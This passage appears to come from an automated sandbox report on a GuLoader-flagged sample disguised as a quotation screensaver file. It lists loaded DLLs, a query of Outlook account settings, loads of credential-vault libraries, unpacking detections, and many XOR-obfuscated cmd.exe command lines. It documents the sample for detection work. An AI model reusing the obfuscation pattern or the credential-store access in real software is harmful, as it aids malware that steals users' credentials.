                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: edgegdi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dxdiagn.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: d3d11.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: d3d12.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: devobj.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wmiclnt.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winbrand.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dsound.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: devrtl.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: spinf.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: drvstore.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wifidisplay.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wlanapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mmdevapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mfplat.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rtworkq.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mf.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mfcore.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ksuser.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mfperfhelper.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mfsensorgroup.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: comppkgsup.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: windows.media.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: windows.applicationmodel.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: appxdeploymentclient.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dispbroker.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: d3d12core.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dxcore.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: d3dscache.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dxilconv.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: d3d9.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mscat32.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: d3d9.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ddraw.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dciman32.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: audioses.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dinput8.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: inputhost.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: hid.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: devenum.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msdmo.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: quartz.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: d3d9.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msvfw32.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iccvid.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iyuv_32.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iyuv_32.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msrle32.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msvidc32.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msyuv.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msyuv.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: tsbyuv.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msyuv.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msacm32.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: avrt.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msacm32.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: midimap.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: avicap32.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msvfw32.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: spfileq.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wininet.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: pstorec.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: vaultcli.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wintypes.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: pstorec.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wininet.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: userenv.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: profapi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wininet.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: pstorec.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: vaultcli.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wintypes.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: pstorec.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\Desktop\z1Quotation.scr.cfg
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: z1Quotation.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: c:\Projects\VS2005\BrowsingHistoryView\Release\BrowsingHistoryView.pdb source: z1Quotation.scr.exe
                Source: Binary string: D:\qb\workspace\23788\source\audio_codec\HDAudioDrv\x64\DAudRelease\IntcDAud.pdb source: dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 137.2.z1Quotation.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 138.2.z1Quotation.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 139.2.z1Quotation.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 140.2.z1Quotation.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 144.2.z1Quotation.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 145.2.z1Quotation.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 146.2.z1Quotation.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 140.2.z1Quotation.scr.exe.400000.0.unpack
                Yara detected GuLoader
                Source: Yara matchFile source: 00000000.00000002.33495375188.0000000006463000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.33493748290.0000000000637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.33493748290.0000000000685000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.33493748290.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: z1Quotation.scr.exe PID: 2504, type: MEMORYSTR
                Obfuscated command line found
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
